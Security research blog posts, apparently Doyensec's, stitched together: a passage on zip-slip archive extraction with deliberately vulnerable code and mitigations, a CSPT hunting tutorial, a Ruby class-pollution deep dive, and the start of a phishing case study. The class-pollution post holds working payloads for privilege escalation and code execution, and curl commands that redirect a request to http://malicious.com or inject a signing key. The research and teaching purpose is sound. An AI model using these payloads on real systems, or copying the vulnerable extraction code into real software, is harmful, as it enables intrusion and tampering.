This can occur when archive extraction is improperly handled, as archives may contain files with filenames referencing parent directories (e.g., using ../). If not properly checked, these sequences may cause the extraction to occur outside the intended directory.

For example, consider a ZIP file with the following structure:

/malicious
    /foo.txt
    /foo.py
    /../imbad.txt

When unzipping the archive to /home/output, if the extraction method does not validate or sanitize the file paths, the contents may be written to the following locations:

/home/output/foo.txt
/home/output/foo.py
/home/imbad.txt

As a result, imbad.txt would be written outside the intended directory. If the vulnerable program runs with high privileges, this could also allow the attacker to overwrite sensitive files, such as /etc/passwd – where Unix-based systems store user account information.

Proving the Concept: Code Examples

To demonstrate the vulnerability, I created several proof-of-concept examples in various programming languages. These code snippets showcase vulnerable implementations where the archive extraction is improperly handled.

Python

The combination of the ZipFile library as reader and shutil.copyfileobj() as writer makes the programmer responsible for handling the extraction correctly.

The usage of shutil.copyfileobj() is straightforward: as the first argument, we pass the file descriptor of the file whose contents we want to extract, and as the second argument, we pass the file descriptor to the destination file. Since the method receives file descriptors instead of paths, it doesn’t know if the path is out of the output directory, making the following implementation vulnerable.

def unzip(file_name, output):
    # bad
    with zipfile.ZipFile(file_name, 'r') as zf:
        for filename in zf.namelist():
            # Output
            output_path = os.path.join(output, filename)
            with zf.open(filename) as source:
                with open(output_path, 'wb') as destination:
                    shutil.copyfileobj(source, destination)
                    
unzip1(./payloads/payload.zip", "./test_case")

If we run the previous code, we’ll realize that instead of extracting the zip content (poc.txt) to the test_case folder, it will be extracted to the parent folder:

$ python3 zipfile_shutil.py

$ ls test_case
# No output, empty folder

$ ls
payloads  poc.txt  test_case  zipfile_shutil.py

Ruby

Zip::File.open(file_name).extract(entry, file_path)

The extract() method in Ruby’s zip library is used to extract an entry from the archive to the file_path directory. This method is unsafe since it doesn’t remove redundant dots and path separators. It’s the caller’s responsibility to make sure that file_path is safe:

require 'zip'
 
def unzip1(file_name, file_path)
  # bad
  Zip::File.open(file_name) do |zip_file|
    zip_file.each do |entry|
      extraction_path = File.join(file_path, entry.name)
      FileUtils.mkdir_p(File.dirname(extraction_path))
      zip_file.extract(entry, extraction_path) 
    end
  end
end

unzip1('./payloads/payload.zip', './test_case/')

$ ruby zip_unsafe.rb

$ ls test_case
# No output, empty folder

$ ls
payloads  poc.txt  test_case  zip_unsafe.rb

PHP, Swift, JS and Java

All the other cases are documented in Doyensec’s repository, along with the Semgrep rules and the labs.

Unsafe Unpacking Labs

As part of the research, I developed a few web applications that allow users to test whether specific archive extraction implementations are vulnerable to decompression attacks.

RUN: without uploading an archive, the application will extract one of the prebuilt malicious archives. If the user uploads an archive, that archive will be unpacked instead.
Clear TXT Files: the application will remove all the extracted files from the previous archives.
Fetch Directory Contents: the web application will show you both the archive directory (where files are supposed to be extracted) and the current directory (where files are NOT supposed to be extracted).

These web application labs are available for every language except Swift, for which a desktop application is provided instead.

Developing Semgrep Rules for Vulnerability Detection

One of the most efficient ways to detect vulnerabilities in open-source projects is by using static application analysis tools. Semgrep is a fast, open-source, static analysis tool that searches code, finds bugs, and enforces secure guardrails and coding standards.

Semgrep works by scanning source code for specific syntax patterns. Since it supports various programming languages and makes it simple to write custom rules, it was ideal for my research purposes.

In the following example I’m using the Unsafe-Unpacking/Python/PoC/src folder from the GitHub repository, which contains 5 unzipping vulnerabilities. You can run the Semgrep rule by using the following command:

semgrep scan --config=../../rules/zip_shutil_python.yaml

...

┌─────────────────┐
│ 5 Code Findings │
└─────────────────┘

    zipfile_shutil.py
   ❯❯❱ rules.unsafe_unpacking
          Unsafe Zip Unpacking

           13┆ shutil.copyfileobj(source, destination)
            ⋮┆----------------------------------------
           21┆ shutil.copyfileobj(source, destination)
            ⋮┆----------------------------------------
           31┆ shutil.copyfileobj(source, destination)
            ⋮┆----------------------------------------
           41┆ shutil.copyfileobj(source, destination)
            ⋮┆----------------------------------------
           57┆ shutil.copyfileobj(source_file, target_file)

A set of 15 rules can be found in the GitHub repository.

Mitigation

Since in most of the vulnerable implementations the programmer is responsible for sanitizing or validating the output path, they can take two approaches to mitigate the problem.

1. Path Sanitization

To sanitize the path, the filename should be normalized. In the case of Ruby, the method Path.basename can be used, which removes redundant dots and converts a path like ../../../../bad.txt to bad.txt.

In the following code, when using File.join to compute the output path, File.basename is called to sanitize the entry filename from the archive, mitigating the vulnerability:

def safe_unzip(file_name, output)
  # good
  Zip::File.open(file_name) do |zip_file|
    zip_file.each do |entry|
      # sanitize the entry path
      file_path = File.join(output, File.basename(entry.name))
      FileUtils.mkdir_p(File.dirname(file_path))
      zip_file.extract(entry, file_path) 
    end
  end
end

The side effect of this mitigation is that the archive’s folder structure is flattened, and all files are extracted to a single folder. Due to this, the solution may not be ideal for many applications.

Another solution would be using Pathname.new().cleanpath, pathname (a built-in Ruby class). It can normalize paths and remove any ../ sequences:

require 'pathname'

def safe_unzip(file_name, output)
  output += File::SEPARATOR unless output.end_with?(File::SEPARATOR)

  Zip::File.open(file_name) do |zip_file|
    zip_file.each do |entry|
      # Remove any relative path components like "../"
      sanitized_name = Pathname.new(entry.name).cleanpath.to_s
      sanitized_path = File.join(output, sanitized_name)

      FileUtils.mkdir_p(File.dirname(sanitized_path))
      zip_file.extract(entry, sanitized_path)
    end
  end
end

However, if the developer wants to sanitize the path themselves by removing ../ using any kind of replacement, they should make sure that the sanitization is applied repeatedly until there are no ../ sequences left. Otherwise, cases like the following can occur, leading to a bypass:

entry = "..././bad.txt"
sanitized_name = entry.gsub(/(\.\.\/)/, '') # ../bad.txt

2. Path Validation

Before writing the contents of the entry to the destination path, you should ensure that the write path is within the intended destination directory. This can be done by using start_with? to check if the write path starts with the destination path, which prevents directory traversal attacks.

def safe_unzip(file_name, output)
  output += File::SEPARATOR unless output.end_with?(File::SEPARATOR)
  # good
  Zip::File.open(file_name) do |zip_file|
    zip_file.each do |entry|
      safe_path = File.expand_path(entry.name, output)

      unless safe_path.start_with?(File.expand_path(output))
        raise "Attempted Path Traversal Detected: #{entry.name}"
      end

      FileUtils.mkdir_p(File.dirname(safe_path))
      zip_file.extract(entry, safe_path) 
    end
  end
end

It’s important to note that File.expand_path should be used instead of File.join. Using File.expand_path() is crucial because it converts a relative file path into an absolute file path, ensuring proper validation and preventing path traversal attacks.

For example, consider the following secure approach using File.expand_path:

# output = Ruby/PoC/test_case

# path = Ruby/PoC/secret.txt
path = File.expand_path(entry_var, output)

# Check for path traversal
unless path.start_with?(File.expand_path(output))
    raise "Attempted Path Traversal Detected: #{entry_var}"
end

In this case File.expand_path converts path to an absolute path, and the check with start_with correctly verifies whether the extracted file path is within the intended output directory.

On the other hand, if you use File.join to build the output path, it may result in vulnerabilities:

# output = Ruby/PoC/test_case

# path = Ruby/PoC/test_case/../secret.txt
path = File.join(output, entry_var)

# Incorrect check
unless path.start_with?(File.expand_path(output))
    raise "Attempted Path Traversal Detected: #{entry_var}"
end

The check would incorrectly return true even though the path actually leads outside the intended directory (test_case/../secret.txt), allowing an attacker to bypass the validation and perform a path traversal. The takeaway is to always normalize the path before verifying.

One detail I missed, which my mentor (Savio Sisco) pointed out, is that in the original safe_method, I didn’t include the following line:

output += File::SEPARATOR unless output.end_with?(File::SEPARATOR)

Without this line, it was still possible to bypass the start_with check. Although path traversal is not possible in this case, it could still lead to writing outside of the intended directory:

output = "/home/user/output"
entry.name = "../output_bypass/bad.txt"
safe_path = File.expand_path(entry.name, output) # /home/user/output_bypass/bad.txt
safe_path.start_with?(File.expand_path(output))# true

Conclusions

This research delves into the issue of unsafe archive extraction across various programming languages. The post shows how giving developers more freedom also places the responsibility on them. While manual implementations are important, they can also introduce serious security risks.

Additionally, as security researchers, it is important to understand the root cause of the vulnerability. By developing Semgrep rules and labs, we hope it will help others to identify, test and mitigate these vulnerabilities. All these resources are available in the Doyensec repository.

Decompression attacks are a broad field of research. While this blog covers some cases related to file extraction, there are still many other attacks, such as zip bombs and symlink attacks, that need to be considered.

A Few Thoughts On My Internship

Although this blog post is not about the internship, I would like to use this opportunity to discuss my experience too.

Two years ago, during my OSWE preparation, I came across a Doyensec blog post, and I used them as study resource . Months later, I found out they here hiring for an internship which I thought was an incredible opportunity.

The first time I applied, I received my very first technical challenge — a set of vulnerable code that was a lot of fun to work with if you enjoy reading code. However, I wasn’t able to pass the challenge that year. This year, after two interview rounds with Luca and John, I was finally accepted. The interviews were 360 degree, covering various aspects like how to fix a vulnerability, how computers work, how to make a secure snippet vulnerable, and how to approach threat modeling.

In my first few weeks, I was assigned to some projects with a lot of guidance from other security engineers. I had the chance to talk to them about their work at Doyensec and even chat with one former intern about his internship experience. I learned a lot about the company’s methodology, not only in terms of bug hunting but also in how to be more organized — both in work and in life. Just like many CTF players, I was used to working late into the night, but since I wasn’t working alone on these projects, this habit started to interfere with communication. Initially, it felt strange to open Burp when the sun was still up, but over time, I got used to it. I didn’t realize how much this simple change could improve my productivity until I fully adjusted.

Working on projects with large codebases or complex audits really pushed me to keep searching for bugs, even when it seemed like a dead end. There were times when I got really nervous after days without finding anything of interest. However, Savio was a great help during these moments, advising me to stay calm and stick to a clear methodology instead of letting my nerves drive me hunt without thinking. Eventually, I was able to find some cool bugs on those projects.

Even though I had very high expectations, this experience definitely lived up to them. A huge thanks to the team, especially Luca and Savio, who took great care of me throughout the entire process.

CSPT the Eval Villain Way!

2024-12-03T00:00:00+01:00

Doyensec’s Maxence Schmitt recently built a playground to go with his CSPT research. In this blog post, we will demonstrate how to find and exploit CSPT bugs with Eval Villain. For this purpose, we will leverage the second challenge of Maxence’s playground.

A step-by-step intro to CSPT with Eval Villain

The next image shows what this methodology yields.

We’ve added some boxes and arrows in orange to better illustrate the current situation. First, Eval Villain saw that part of the page’s path is being used in a fetch request. There, you can plainly see the asdf%2f.. was being URL decoded. Or if you prefer, you can expanded the “Encoder function” group to check. Either way, Eval Villain had discovered the CSPT sink.

The second square is on top of a debug statement from evSourcer. This was where the response from the first fetch was being added to Eval Villain’s source bank. As a result, Eval Villain warned us that the _id parameter from the CSPT response had hit another fetch sink. Again, you could get a bit more details from the “Encoder function”.

From the arg[2/2] of each fetch we learned more. The first fetch is a GET that had "redirect":"follow" and the second had "method":"POST". So we controlled the path of a client-side GET request and an open redirect could have sent that request to our own server. The response of our own server would have then been used in the path of an authenticated POST request. This one image shows the entire exploit chain for a CSPT2CSRF exploit.

All of this instrumentation stays around to help us with our exploit. Clicking the provided solution we see the following image. This shows exactly how the exploit works.

Building the picture yourself

Step 0: Tools

You will need Firefox with Eval Villain installed.

You’ll also need the CSPT playground, which runs in Docker via docker compose up. This should bring up a vulnerable web app on http://127.0.0.1:3000/. Read the README.md for more info.

We really do recommend trying this out in the playground. CSPT is one of those bugs that seems easy when you read about it in a blog but feels daunting when you run into it on a test.

Step 1: Finding a CSPT

Log into the playground and visit the “CSPT2CSRF : GET to POST Sink” page. Open the console with ctrl+shift+i on Linux or cmd+option+i on Mac. Ensure Eval Villain is turned on. With the default configuration of Eval Villain, you should just see [EV] Functions hooked for http://127.0.0.1:3000 in the console.

In a real test though, we would see that there is obviously a parameter in the URL path. Eval Villain does not use the path as a source by default, due to false positives. So lets turn on “Path search” in the “Enable/Disable” pop-up menu (click the Eval Villain logo).

Now, after a page refresh, Eval Villain will tells us about two calls to fetch, each using the path. We don’t know if they are CSPT yet, we need to check if ../ is accepted, but it looks hopeful.

Note: You may only see one fetch here, that is ok.

Step 2 Testing For CSPT

To test for actual CSPT, just add the string %2fasdf%2f.. to the end of the path. This is a good tip, since this will normalize to the original path, the website will act the same if it’s vulnerable. When you refresh the page you will see this in the console.

It’s that easy to find a CSPT primitive. Had the source been in window.name or a URL parameter, Eval Villain would likely have found it right away.

Since the URL path was encoded, Eval Villain gives us an encoder function. You can paste that into your console and use it to try new payloads quickly. The function will automatically apply URL encoding.

With a CSPT primitive, the next step toward exploitation is learning how the response of this request is used. For that, we want to ingest the response as a new source for Eval Villain.

Step 3 Enable `evSourcer`

First you need to enable the evSourcer global in Eval Villain. Go to the configuration page from the pop-up menu and scroll to the globals table. Enable the row that says “evSourcer”. Don’t forget to click save.

Now you can refresh the page and just run evSourcer.toString() in the console to verify the configuration change took.

You can run a quick test to try out the feature. Anything that goes into the second parameter of this function will be put into the Eval Villain source bank. Before using evSinker the string foobar does not generate a warning from the eval sink, afterward it does.

Step 4: Getting the response of the CSPT request into `evSourcer`

So, if we put the response of the CSPT request into evSourcer, Eval Villain can tell us if it hits eval, .innerHTML, fetch or any other sink we have hooked.

To find the response to the CSPT request, we just look at the stack trace Eval Villain gave us.

Here we have highlighted what we think of as the “magic zone”. When you see function names go from minified garbage, to big readable strings, that is where you typically want to start. That often means a transition from library code to developer written code, either forward or back. One of those two functions are probably what we want. Based on context, fetchNoteById is probably returning the info to Ko. So go to the Ko function in the debugger by clicking the link next to it. Once you get there, beautify the code by clicking the {} icon in the lower left of the code pane.

You will see some code like this:

      return (0, t.useEffect) (
        (
          () => {
            r &&
            ot.fetchNoteById(r).then((e => { // <-- fetchNoteById call here
              ot.seenNote(e._id),         // <-- so `e` is probably our JSON response
              n(e)
            })).catch((e => {
              //...

fetchNoteById apparently returns a promise. This makes sense, so we would normally set a breakpoint in order to inspect e and compare it with the response from fetch. Once you validate it, it’s time to instrument.

Right-click on the line number that contains ot.seenNote and click “Add Conditional breakpoint”. Add in the evSinker call, using a name you can recognize as injecting the e variable. The evSinker function always returns false so we will never actually hit this breakpoint.

Notice we have disabled source maps. Source maps can optimize out variables and make debugging harder. Also, Firefox sometimes takes a minute to work through beautifying code and putting breakpoints at the right spot, so just be patient.

Step 5: Refresh the page, check the secondary sink

Now we just refresh the page. Since we used true as the last parameter to evSinker, we will use console debugging to tell us what got injected. Enable “Debug” in the console. We can also enable XHR in the console to see requests and responses there. The requests we are interested in will directly follow Eval Villain output to the console, so they are easy to find. This is what we see.

For the sake of room, we closed the first fetch group. It does show the asdf%2f.. payload hitting fetch. The “XHR” entry we have open there does not show the directory traversal because it was normalized out. Eval Villain makes it easy to find though. The response from the “XHR” can be seen injected in the console debug below it. Then of course Eval Villain is able to spot it hitting the fetch sink.

Step 6: Extra little things

You may notice that there is no arg[2/2] output in the last picture. That argument is a JavaScript object. Eval Villain by default is configured to only look at strings. Open the pop-up menu, click types and enable objects. Then when you refresh the page you can see from the Eval Villain output what options are being passed to fetch.

Step 7: Exploit

The playground makes finding gadgets easy. Just go to the “gadgets” drop down in the page. The real world does not have that, so Burp Suite’s Bambda search seems to be the best bet. See Maxence’s CSPT research for more on that.

BONUS Feature! Eval Villain in Chrome, Electron and maybe Web Views?

Eval Villain is really just a JavaScript function, with config, that Firefox copy/pastes into each page before it loads. Once injected, it just uses the console to log output. So in theory, you could copy paste this same code manually into anywhere JavaScript is accepted.

Eval Villain 1.11 lets you do just that. Go to the configuration page and scroll to the very bottom. You will see a “Copy Injection” button. If you click it, the entire Eval Villain injection, along with the current configuration, will be put into your clipboard.

Using this we have gotten Eval Villain into an instrumented Electron App. The following screen shot shows Eval Villain running from a conditional breakpoint in Burp’s built-in Chrome browser.

Or you can use the HTTP Mock extension in Burp to paste Eval Villain into a web response. We have not tried it yet, but it will be cool to inject it into a Web View on Android using Frida.

Conclusion

Instrumenting the target code does not really take that long. This blog post explained step by step on how to leverage Eval Villain in order to find and exploit CSPT vulnerabilities. Even for learning new tricks using a playground, Eval Villain helps us debug little mistakes.

Make sure to use the right tool for the right job. For example, Eval Villain can’t decode everything (check out the fragment challenge). Maxence developed a great Burp Extension for CSPT, but it lacks insight into the DOM. Some other tools are Geko, DOMLogger++ and DOM Invader (enable xhr.open and fetch in sinks). Mix and match what works best for you.

Class Pollution in Ruby: A Deep Dive into Exploiting Recursive Merges

2024-10-02T00:00:00+02:00

Introduction

In this post, we are going to explore a rarely discussed class of vulnerabilities in Ruby, known as class pollution. This concept is inspired by the idea of prototype pollution in JavaScript, where recursive merges are exploited to poison the prototype of objects, leading to unexpected behaviors. This idea was initially discussed in a blog post about prototype pollution in Python, in which the researcher used recursive merging to poison class variables and eventually global variables via the __globals__ attribute.

In Ruby, we can categorize class pollution into three main cases:

Merge on Hashes: In this scenario, class pollution isn’t possible because the merge operation is confined to the hash itself.
Merge on Attributes (Non-Recursive): Here, we can poison the instance variables of an object, potentially replacing methods by injecting return values. This pollution is limited to the object itself and does not affect the class.

current_obj.instance_variable_set("@#{key}", new_object)
current_obj.singleton_class.attr_accessor key

Merge on Attributes (Recursive): In this case, the recursive nature of the merge allows us to escape the object context and poison attributes or methods of parent classes or even unrelated classes, leading to a broader impact on the application.

Merge on Attributes

Let’s start by examining a code example where we exploit a recursive merge to modify object methods and alter the application’s behavior. This type of pollution is limited to the object itself.

require 'json'


# Base class for both Admin and Regular users
class Person

  attr_accessor :name, :age, :details

  def initialize(name:, age:, details:)
    @name = name
    @age = age
    @details = details
  end

  # Method to merge additional data into the object
  def merge_with(additional)
    recursive_merge(self, additional)
  end

  # Authorize based on the `to_s` method result
  def authorize
    if to_s == "Admin"
      puts "Access granted: #{@name} is an admin."
    else
      puts "Access denied: #{@name} is not an admin."
    end
  end

  # Health check that executes all protected methods using `instance_eval`
  def health_check
    protected_methods().each do |method|
      instance_eval(method.to_s)
    end
  end

  private

  def recursive_merge(original, additional, current_obj = original)
    additional.each do |key, value|

      if value.is_a?(Hash)
        if current_obj.respond_to?(key)
          next_obj = current_obj.public_send(key)
          recursive_merge(original, value, next_obj)
        else
          new_object = Object.new
          current_obj.instance_variable_set("@#{key}", new_object)
          current_obj.singleton_class.attr_accessor key
        end
      else
        current_obj.instance_variable_set("@#{key}", value)
        current_obj.singleton_class.attr_accessor key
      end
    end
    original
  end

  protected

  def check_cpu
    puts "CPU check passed."
  end

  def check_memory
    puts "Memory check passed."
  end
end

# Admin class inherits from Person
class Admin < Person
  def initialize(name:, age:, details:)
    super(name: name, age: age, details: details)
  end

  def to_s
    "Admin"
  end
end

# Regular user class inherits from Person
class User < Person
  def initialize(name:, age:, details:)
    super(name: name, age: age, details: details)
  end

  def to_s
    "User"
  end
end

class JSONMergerApp
  def self.run(json_input)
    additional_object = JSON.parse(json_input)

    # Instantiate a regular user
    user = User.new(
      name: "John Doe",
      age: 30,
      details: {
        "occupation" => "Engineer",
        "location" => {
          "city" => "Madrid",
          "country" => "Spain"
        }
      }
    )


    # Perform a recursive merge, which could override methods
    user.merge_with(additional_object)

    # Authorize the user (privilege escalation vulnerability)
    # ruby class_pollution.rb '{"to_s":"Admin","name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
    user.authorize

    # Execute health check (RCE vulnerability)
    # ruby class_pollution.rb '{"protected_methods":["puts 1"],"name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
    user.health_check

  end
end

if ARGV.length != 1
  puts "Usage: ruby class_pollution.rb 'JSON_STRING'"
  exit
end

json_input = ARGV[0]
JSONMergerApp.run(json_input)

In the provided code, we perform a recursive merge on the attributes of the User object. This allows us to inject or override values, potentially altering the object’s behavior without directly modifying the class definition.

How It Works:

Initialization and Setup:
- The User object is initialized with specific attributes: name, age, and details. These attributes are stored as instance variables within the object.
Merge:
- The merge_with method is called with a JSON input that represents the additional data to be merged into the User object.
Altering Object Behavior:
- By passing carefully crafted JSON data, we can modify or inject new instance variables that affect how the User object behaves.
- For example, in the authorize method, the to_s method determines whether the user is granted admin privileges. By injecting a new to_s method with a return value of "Admin", we can escalate the user’s privileges.
- Similarly, in the health_check method, we can inject arbitrary code execution by overriding methods that are called via instance_eval.

Example Exploits:

Privilege Escalation: ruby class_pollution.rb {"to_s":"Admin","name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}
- This injects a new to_s method that returns "Admin", granting the user unauthorized admin privileges.
Remote Code Execution: ruby class_pollution.rb {"protected_methods":["puts 1"],"name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}
- This injects a new method into the protected_methods list, which is then executed by instance_eval, allowing arbitrary code execution.

Limitations:

The aforementioned changes are limited to the specific object instance and do not affect other instances of the same class. This means that while the object’s behavior is altered, other objects of the same class remain unaffected.

This example highlights how seemingly innocuous operations like recursive merges can be leveraged to introduce severe vulnerabilities if not properly managed. By understanding these risks, developers can better protect their applications from such exploits.

Real-World Cases

Next, we’ll explore two of the most popular libraries for performing merges in Ruby and see how they might be vulnerable to class pollution. It’s important to note that there are other libraries potentially affected by this class of issues and the overall impact of these vulnerabilities varies.

1. ActiveSupport’s `deep_merge`

ActiveSupport, a built-in component of Ruby on Rails, provides a deep_merge method for hashes. By itself, this method isn’t exploitable given it is limited to hashes. However, if used in conjunction with something like the following, it could become vulnerable:

# Method to merge additional data into the object using ActiveSupport deep_merge
def merge_with(other_object)
merged_hash = to_h.deep_merge(other_object)

merged_hash.each do |key, value|
  self.class.attr_accessor key
  instance_variable_set("@#{key}", value)
end

self
end

In this example, if the deep_merge is used as shown, we can exploit it similarly to the first example, leading to potentially dangerous changes in the application’s behavior.

2. Hashie

The Hashie library is widely used for creating flexible data structures in Ruby, offering features such as deep_merge. However, unlike the previous example with ActiveSupport, Hashie’s deep_merge method operates directly on object attributes rather than plain hashes. This makes it more susceptible to attribute poisoning.

Hashie has a built-in mechanism that prevents the direct replacement of methods with attributes during a merge. Normally, if you try to override a method with an attribute via deep_merge, Hashie will block the attempt and issue a warning. However, there are specific exceptions to this rule: attributes that end with _, !, or ? can still be merged into the object, even if they conflict with existing methods.

Key Points

Method Protection: Hashie protects method names from being directly overridden by attributes ending in _, !, or ?. This means that, for example, trying to replace a to_s method with a to_s_ attribute will not raise an error, but the method will not be replaced either. The value of to_s_ will not override the method behavior, ensuring that existing method functionality remains intact. This protection mechanism is crucial to maintaining the integrity of methods in Hashie objects.
Special Handling of _: The key vulnerability lies in the handling of _ as an attribute on its own. In Hashie, when you access _, it returns a new Mash object (essentially a temporary object) of the class you are interacting with. This behavior allows attackers to access and work with this new Mash object as if it were a real attribute. While methods cannot be replaced, this feature of accessing the _ attribute can still be exploited to inject or modify values.

For example, by injecting "_": "Admin" into the Mash, an attacker could trick the application into accessing the temporary Mash object created by _, and this object can contain maliciously injected attributes that bypass protections.

A Practical Example

Consider the following code:

require 'json'
require 'hashie'

# Base class for both Admin and Regular users
class Person < Hashie::Mash

  # Method to merge additional data into the object using hashie
  def merge_with(other_object)
    deep_merge!(other_object)
    self
  end

  # Authorize based on to_s
  def authorize
    if _.to_s == "Admin"
      puts "Access granted: #{@name} is an admin."
    else
      puts "Access denied: #{@name} is not an admin."
    end
  end

end

# Admin class inherits from Person
class Admin < Person
  def to_s
    "Admin"
  end
end

# Regular user class inherits from Person
class User < Person
  def to_s
    "User"
  end
end

class JSONMergerApp
  def self.run(json_input)
    additional_object = JSON.parse(json_input)

    # Instantiate a regular user
    user = User.new({
      name: "John Doe",
      age: 30,
      details: {
        "occupation" => "Engineer",
        "location" => {
          "city" => "Madrid",
          "country" => "Spain"
        }
      }
    })

    # Perform a deep merge, which could override methods
    user.merge_with(additional_object)

    # Authorize the user (privilege escalation vulnerability)
    # Exploit: If we pass {"_": "Admin"} in the JSON, the user will be treated as an admin.
    # Example usage: ruby hashie.rb '{"_": "Admin", "name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
    user.authorize
  end
end

if ARGV.length != 1
  puts "Usage: ruby hashie.rb 'JSON_STRING'"
  exit
end

json_input = ARGV[0]
JSONMergerApp.run(json_input)

In the provided code, we are exploiting Hashie’s handling of _ to manipulate the behavior of the authorization process. When _.to_s is called, instead of returning the method-defined value, it accesses a newly created Mash object, where we can inject the value "Admin". This allows an attacker to bypass method-based authorization checks by injecting data into the temporary Mash object.

For example, the JSON payload {"_": "Admin"} injects the string “Admin” into the temporary Mash object created by _, allowing the user to be granted admin access through the authorize method even though the to_s method itself hasn’t been directly overridden.

This vulnerability highlights how certain features of the Hashie library can be leveraged to bypass application logic, even with protections in place to prevent method overrides.

Escaping the Object to Poison the Class

When the merge operation is recursive and targets attributes, it’s possible to escape the object context and poison attributes or methods of the class, its parent class, or even other unrelated classes. This kind of pollution affects the entire application context and can lead to severe vulnerabilities.

require 'json'
require 'sinatra/base'
require 'net/http'

# Base class for both Admin and Regular users
class Person
  @@url = "http://default-url.com"

  attr_accessor :name, :age, :details

  def initialize(name:, age:, details:)
    @name = name
    @age = age
    @details = details
  end

  def self.url
    @@url
  end

  # Method to merge additional data into the object
  def merge_with(additional)
    recursive_merge(self, additional)
  end

  private

  # Recursive merge to modify instance variables
  def recursive_merge(original, additional, current_obj = original)
    additional.each do |key, value|
      if value.is_a?(Hash)
        if current_obj.respond_to?(key)
          next_obj = current_obj.public_send(key)
          recursive_merge(original, value, next_obj)
        else
          new_object = Object.new
          current_obj.instance_variable_set("@#{key}", new_object)
          current_obj.singleton_class.attr_accessor key
        end
      else
        current_obj.instance_variable_set("@#{key}", value)
        current_obj.singleton_class.attr_accessor key
      end
    end
    original
  end
end

class User < Person
  def initialize(name:, age:, details:)
    super(name: name, age: age, details: details)
  end
end

# A class created to simulate signing with a key, to be infected with the third gadget
class KeySigner
  @@signing_key = "default-signing-key"

  def self.signing_key
    @@signing_key
  end

  def sign(signing_key, data)
    "#{data}-signed-with-#{signing_key}"
  end
end

class JSONMergerApp < Sinatra::Base
  # POST /merge - Infects class variables using JSON input
  post '/merge' do
    content_type :json
    json_input = JSON.parse(request.body.read)

    user = User.new(
      name: "John Doe",
      age: 30,
      details: {
        "occupation" => "Engineer",
        "location" => {
          "city" => "Madrid",
          "country" => "Spain"
        }
      }
    )

    user.merge_with(json_input)

    { status: 'merged' }.to_json
  end

  # GET /launch-curl-command - Activates the first gadget
  get '/launch-curl-command' do
    content_type :json

    # This gadget makes an HTTP request to the URL stored in the User class
    if Person.respond_to?(:url)
      url = Person.url
      response = Net::HTTP.get_response(URI(url))
      { status: 'HTTP request made', url: url, response_body: response.body }.to_json
    else
      { status: 'Failed to access URL variable' }.to_json
    end
  end

  # Curl command to infect User class URL:
  # curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://example.com"}}}' http://localhost:4567/merge

  # GET /sign_with_subclass_key - Signs data using the signing key stored in KeySigner
  get '/sign_with_subclass_key' do
    content_type :json

    # This gadget signs data using the signing key stored in KeySigner class
    signer = KeySigner.new
    signed_data = signer.sign(KeySigner.signing_key, "data-to-sign")

    { status: 'Data signed', signing_key: KeySigner.signing_key, signed_data: signed_data }.to_json
  end

  # Curl command to infect KeySigner signing key (run in a loop until successful):
  # for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge; done

  # GET /check-infected-vars - Check if all variables have been infected
  get '/check-infected-vars' do
    content_type :json

    {
      user_url: Person.url,
      signing_key: KeySigner.signing_key
    }.to_json
  end

  run! if app_file == $0
end

In the following example, we demonstrate two distinct types of class pollution:

(A) Poisoning the Parent Class: By recursively merging attributes, we can modify variables in the parent class. This modification impacts all instances of that class and can lead to unintended behavior across the application.
(B) Poisoning Other Classes: By brute-forcing subclass selection, we can eventually target and poison specific classes. This approach involves repeatedly attempting to poison random subclasses until the desired one is infected. While effective, this method can cause issues due to the randomness and potential for over-infection.

Detailed Explanation of Both Exploits

(A) Poisoning the Parent Class

In this exploit, we use a recursive merge operation to modify the @@url variable in the Person class, which is the parent class of User. By injecting a malicious URL into this variable, we can manipulate subsequent HTTP requests made by the application.

For example, using the following curl command:

curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://malicious.com"}}}' http://localhost:4567/merge

We successfully poison the @@url variable in the Person class. When the /launch-curl-command endpoint is accessed, it now sends a request to http://malicious.com instead of the original URL.

This demonstrates how recursive merges can escape the object level and modify class-level variables, affecting the entire application.

(B) Poisoning Other Classes

This exploit leverages brute-force to infect specific subclasses. By repeatedly attempting to inject malicious data into random subclasses, we can eventually target and poison the KeySigner class, which is responsible for signing data.

For example, using the following looped curl command:

for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge --silent > /dev/null; done

We attempt to poison the @@signing_key variable in KeySigner. After several attempts, the KeySigner class is infected, and the signing key is replaced with our injected key.

This exploit highlights the dangers of recursive merges combined with brute-force subclass selection. While effective, this method can cause issues due to its aggressive nature, potentially leading to the over-infection of classes.

In the latter examples, we set up an HTTP server to demonstrate how the infected classes remain poisoned across multiple HTTP requests. The persistent nature of these infections shows that once a class is poisoned, the entire application context is compromised, and all future operations involving that class will behave unpredictably.

The server setup also allowed us to easily check the state of these infected variables via specific endpoints. For example, the /check-infected-vars endpoint outputs the current values of the @@url and @@signing_key variables, confirming whether the infection was successful.

This approach clearly shows how class pollution in Ruby can have lasting and far-reaching consequences, making it a critical area to secure.

Conclusion

The research conducted here highlights the risks associated with class pollution in Ruby, especially when recursive merges are involved. These vulnerabilities are particularly dangerous because they allow attackers to escape the confines of an object and manipulate the broader application context. By understanding these mechanisms and carefully considering how data merges are handled, it is possible to mitigate the risk of class pollution in Ruby applications.

We’re hiring!

We are a small highly focused team. We love what we do and we routinely take on difficult engineering challenges to help our customers build with security. If you’ve enjoyed this research, consider applying via our careers portal to spend up to 11 weeks/year on research projects like this one!

Applying Security Engineering to Make Phishing Harder - A Case Study

2024-09-19T00:00:00+02:00

Introduction

Recently Doyensec was hired by a client offering a “Communication Platform as a Service”. This platform allows their clients to craft a customer service experience and to communicate with their own customers via a plethora of channels: email, web chats, social media and more.

While undoubtedly valuable, such a service introduces a unique threat model. Our client’s users work with a vast amount of incoming correspondence from outside (often anonymous) users, on a daily basis. This makes them particularly vulnerable to phishing and other social engineering attacks.

